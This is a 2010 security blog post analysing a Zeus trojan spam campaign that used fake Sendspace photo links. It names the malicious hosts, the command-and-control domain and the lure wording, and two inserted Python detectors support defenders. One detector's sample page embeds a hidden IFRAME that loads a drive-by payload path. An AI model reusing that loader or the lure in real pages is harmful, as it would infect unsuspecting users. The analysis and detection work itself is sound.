Internet Domain Registry


Monday, 18 January 2010

Sendspace Zbot spreader a Flashback to Dec 15-20

Posted on 12:41 by Unknown
From December 15th to December 20th, the top Zbot or "Zeus" trojan spreader was a spam email campaign which claimed to have news about a photo that may depict the recipient. The "photo" was actually called "photo.exe" and the website from which it was to be downloaded was intended to look like "Sendspace.com", a popular file sharing service.

Beginning early in the morning of January 16th, the UAB Spam Data Mine began to notice that the Sendspace version of Zeus may be making a return. On January 16th, we received six copies of the spam, nearly identical to those received December 15-20. They came between 6:15 and 8:30 AM, and then stopped.

The spam messages ask a variation of a question such as:

Hey! Is this photo yours?

with subjects such as:

Fw:your photo
Re:your photo
Re:
Fw:look

and provide a link, supposedly to a "sendspace" page, for you to see the photo.

On January 17th, we saw another burst, beginning shortly after 8:00 AM, and ending about 10:15 AM, with 90 messages being received.

Then at 11:15 PM on January 17th the real campaign began, and it has been flowing steadily ever since; the volume is clearly on a rising trend, with just over 700 copies seen today so far.

The URLs we've seen in the spam are these:


Note the typos in those URLs? Some ".compl" instead of ".com.pl", some "sendspacecom" instead of "sendspace.com", and "wwwsendspace" instead of "www.sendspace". Those are the reasons the bad guys do test runs such as the ones we saw on the 16th and 17th: they need to get their bugs worked out.
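A defender-side check for the hostname pattern discussed above, as an added example that is not code from the UAB Spam Data Mine: it flags URLs whose hostname starts with a trusted brand's name but is actually registered under some other domain, and it tolerates the dropped-dot typos the campaign shipped. The multi-label suffix table and the sample spam line are constructed assumptions.

```python
"""Flag hostnames that bury a well-known brand inside a subdomain of some
other registered domain, the pattern used by the "sendspace" Zeus spreader.
Added example, not code from the blog; suffix table and sample are assumed."""
import re

BRANDS = {"sendspace.com"}

# Minimal multi-label public suffixes taken from the hosts seen in the post.
# Assumption: a real deployment would use the full Public Suffix List.
MULTI_LABEL_SUFFIXES = {"com.pl", "co.uk", "me.uk", "org.uk", "co.kr",
                        "jpn.com", "kr.com", "no.com", "uy.com"}

def registered_domain(host):
    """Best-effort registrable domain: last two labels, or last three when
    the last two form a known multi-label suffix such as com.pl or co.uk."""
    labels = host.lower().strip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])

def brand_spoof(host):
    """Return the impersonated brand if `host` begins with it but is
    registered elsewhere; None for the genuine brand domain or no match.
    Dots are stripped before comparing so that the campaign's typo variants
    (www.sendspacecom..., wwwsendspace.com..., ...compl) are still caught."""
    host = host.lower().strip(".")
    reg = registered_domain(host)
    flat = host.replace(".", "")
    for brand in BRANDS:
        if reg == brand:
            return None  # genuine brand domain or one of its subdomains
        bflat = brand.replace(".", "")
        if flat.startswith(bflat) or flat.startswith("www" + bflat):
            return brand
    return None

def scan_urls(text):
    """Pull hostnames out of free text (a spam body, a proxy log line) and
    return those judged to be spoofing a brand, in order of appearance."""
    hosts = re.findall(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})", text, re.I)
    return [h for h in hosts if brand_spoof(h)]

# Constructed sample spam body (not a real message from the campaign).
SAMPLE_SPAM = ("Hey! Is this photo yours? http://www.sendspace.com.iko999j1.com.pl/photo "
               "compare with the real http://www.sendspace.com/ site")
```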

The webpage looks like this: [screenshot of the fake Sendspace download page not reproduced here]
While they are at it, perhaps they'll remember to update their malware as well. The version being distributed in this campaign is the same one that was being distributed when the campaign ended on December 20th, which means that 34 out of 41 anti-virus products can detect it, according to this VirusTotal report.

The websites also carry a secondary infector. An IFRAME in the page's code calls a malicious website at "gerolli.co.uk". Last go-around it was pulling a file from the "/2img/" subdirectory there; this time it's pulling "/3img/in.php", which when loaded causes "pdf.pdf" to be dropped on the machine, leading to a fake anti-virus product being installed within a few minutes.
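A small analysis helper for the IFRAME secondary infector described above, as an added example that is not code from the blog: given the HTML of a fetched landing page, it lists every IFRAME that loads from a host other than the page's own and notes whether it is hidden. The sample HTML is constructed to match the post's description, not captured from the campaign.

```python
"""List off-site IFRAMEs in a landing page, the secondary-infector pattern
described in the post. Added example, not the blog's code; sample HTML is
constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})

def is_hidden(attrs):
    """Heuristic: zero/one-pixel size or display:none / visibility:hidden
    styling is how a drive-by loader frame usually stays invisible."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = (attrs.get("width", "").strip() in ("0", "1")
            or attrs.get("height", "").strip() in ("0", "1"))
    return tiny or "display:none" in style or "visibility:hidden" in style

def offsite_iframes(html, page_host):
    """Return [(src_host, hidden)] for each iframe whose absolute src points
    at a host other than page_host; relative srcs stay on-site and are skipped."""
    parser = IframeCollector()
    parser.feed(html)
    found = []
    for attrs in parser.iframes:
        src = attrs.get("src", "").strip()
        if not src.startswith(("http://", "https://", "//")):
            continue
        host = urlparse(src if "://" in src else "http:" + src).hostname or ""
        if host and host.lower() != page_host.lower():
            found.append((host.lower(), is_hidden(attrs)))
    return found

# Constructed landing page modelled on the post: a visible fake download
# link plus a hidden IFRAME to the secondary-infector host and path.
SAMPLE_HTML = """<html><body>
<a href="photo.exe">Download photo.exe</a>
<iframe src="http://gerolli.co.uk/3img/in.php" width="0" height="0"
        style="display: none"></iframe>
<iframe src="/help.html"></iframe>
</body></html>"""
```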

The Zeus bot uses "stomaid.ru" as its Command & Control - just as it has since December 9th.

The computers hosting the "sendspace" version of this webpage are also hosting the "USAA" version that we discussed in yesterday's article - USAA Bank Latest Avalanche Scam.

If you want to see the December version websites, they are listed below:

Posted in zbot